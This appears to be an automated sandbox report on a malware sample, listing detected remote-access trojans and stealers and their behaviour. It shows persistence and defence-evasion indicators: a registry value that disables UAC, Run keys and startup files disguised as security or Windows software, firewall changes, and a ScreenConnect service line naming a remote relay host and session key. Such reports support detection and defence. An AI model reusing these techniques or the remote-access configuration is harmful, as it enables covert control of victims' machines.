Analysis Overview
SHA256
672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
Threat Level: Known bad
The file NewTextDocumentmod.exe.zip was found to be: Known bad.
Malicious Activity Summary
NanoCore
Quasar payload
Xworm
Detect Vidar Stealer
Xred
Vidar
Xred family
AsyncRat
UAC bypass
Detect Xworm Payload
Remcos family
Remcos
Vidar family
Xworm family
Asyncrat family
Nanocore family
Quasar family
Quasar RAT
Async RAT payload
Adds policy Run key to start application
Command and Scripting Interpreter: PowerShell
Sets service image path in registry
Disables Task Manager via registry modification
Downloads MZ/PE file
Modifies Windows Firewall
Reads user/profile data of web browsers
Executes dropped EXE
Drops startup file
Loads dropped DLL
Checks computer location settings
Event Triggered Execution: Component Object Model Hijacking
Adds Run key to start application
Checks whether UAC is enabled
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Boot or Logon Autostart Execution: Authentication Package
Enumerates processes with tasklist
Drops autorun.inf file
Drops file in Windows directory
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
Program crash
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Modifies registry key
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Uses Volume Shadow Copy service COM API
Modifies registry class
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-01-26 00:01
Signatures
Xred family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-26 00:01
Reported
2025-01-26 00:04
Platform
win7-20240903-en
Max time kernel
132s
Max time network
150s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NanoCore
Nanocore family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Remcos
Remcos family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Vidar
Vidar family
Xred
Xred family
Xworm
Xworm family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (0cef7d10d8f459fc)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=64840446-9df6-4c65-8411-6e7dc5c317a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA10uxErlupkG5x0OI0LD9GgAAAAACAAAAAAAQZgAAAAEAACAAAACf55AjgxQWYDl6hetgPTS1%2bFUPHtkbCi%2b09QRjV2eDIAAAAAAOgAAAAAIAACAAAADWrAOL4BMPtrjaYIBA2Wq%2fVLw2kgJdEtiyEf3xyH%2bIVqAEAAAv%2b5XbAC%2bay6Hh4phaIEZpucD0pi5LDxu8JYopvUVRPfL6%2fnR%2fKy%2bKwEEJIcRikDK%2fHrZj9cLi4ckXIrAXeqJI4RQUyD2n2RB6IgjFBgXQQAylwyOaNvB2wv74WE2GSGS5RW7TDM1RcEEt2%2fio2rPRS%2fzWXldf0vDAGDCXdKr3JMNGNiFG%2bBAlNz7NOHJjHj0f7XIGC27%2bUwWSdijqtMYkzFlYQI7%2b1vvdlIyQlIrUC9Qw%2fEVGE1am1dL2PKuoQMuL5iKM78a%2fsLiJ0462nAixfTAgWoIT%2fMTjvYyY5YIMqbbL3qgODCgY82SNNoGtjCkjbb54VUfvEjGpm9kCRskkQyATanLYCop2i2OQXFBIj6%2bzE4Ad6vmXrTUphfgY%2bkxPIeZSqZschXkFMnSbgwuzwrYJhVZDSk6pVeIjRXzJCEECZIaG2W6fr0RMgBVTJ%2ba%2b7OOhRaUuwOhhs0tRK8HuUGdvvq4uLyJLyi4c0LlhR4om2sc03BYdlgDrh786fTEaJ34zFKcdPqnZ%2bAZjTMEl1fJm6qL3eDDww42VXJ7E0rWdHj2cs6JNXwJhar5p%2fcc1cp8ZmJK5GdpLnbmhv3cBgNRD5dhip8GrWXxN9TZooIZEc38SI%2fVfW9TsyQbQapdwLc%2bI0dmke8FtFWB4QRwGRgJLNAVytKJqEti36YFuhuAD8EXR4GUHN9BzHi0Nkc6sVxuMX1gA38RlbrP7ZINCwXTBhNHWkyNV6BZEfJWCy6mPBYZN7TkVsMFGpzgRDshRrEhzORcim9m3Fig8%2bwZlR9oJ4pXZ2VXckBm1Og5mpJJa7mzZuO9WieVxfeR3JfBcMbMFhLV21nCzoKVFR%2f2546uQAMZJLbwE7T7yZ150DokywDAsGW0RrXEItUPOx6lLMTT4Id5FtDX9A752412V0%2fAJnsyOsN9VdFQC46wXLCuF0yt4jNPOIjpyC4PN9kfcwHaAyye7%2fL6S%2bgn5YcwaE11vpQOrUBUyAS%2bzti%2bRAu6jyQ9VB%2fDemOyMX
0m5xnAyYykOcPj8UBqJCfM2IVKwFgxNXBFKFYeFbTCwV8zxTJgnHnxaKvZWrGrl1yHWi1QGnLI2FG3D%2fOlnA5LpVsWrTfUF4sMVbEk%2f%2fFQwZIUzxDV3d5ngX8YmUiGa6%2blLoUL4HEjpoGqY229U5k5Z2V9ekJ4%2f9kxMr6QoHEyPfztw3idsxZMwVM4G6cvhfYV5ViQIVaMGpB0zcxu66YDC4k%2fGx4TKUAzxWp0rIaB2JNrY1K1wHReQfISyng76Qtr%2bakfTPpppKThcJ1DKcihcrpTQKwhCSSLR3S2GkpCfno2mW%2bBmaYA44dv%2f6y0SAlzpYOsReZYbqPzr6ZZPm8xFjCK5aSbV8S9E5Z6LzGBZ0aDuRRFMShOLu9DZ%2f8uWLu47rMzOZnywOjYNT4sDM8u6%2fOs45xNY5VP4nD9S18%2fOr40HRhWsJS43VmNinW%2fL93DBMr2JrO3jtOW%2by0U8RFgPCW41fOlpXCwUpgfEidsv5s6niKUPnZLUAuD1Sm31AJD7BEhEh2SIY3oqC6A9kBDVcF8ooxWqycRrsOldQ%2ff%2fqWaXuEAAAACKUSN5Kh0v1O4kC4Is4FuSvGAdooFKdhtoY2dmnBaiPQ9XIcF9lo%2bgNGhAqZjFhe62I8sjHJXNnQTKW42xXncf&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c=\"" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HasInfo.vbs | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk | C:\Users\Admin\AppData\Local\Temp\a\Network.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk | C:\Users\Admin\AppData\Local\Temp\a\Network.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Host = "C:\\Program Files (x86)\\SCSI Host\\scsihost.exe" | C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network = "C:\\Users\\Admin\\AppData\\Roaming\\Network.exe" | C:\Users\Admin\AppData\Local\Temp\a\Network.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Host = "C:\\Program Files (x86)\\SCSI Host\\scsihost.exe" | C:\Users\Admin\AppData\Local\Temp\a\jij.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\a\jij.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
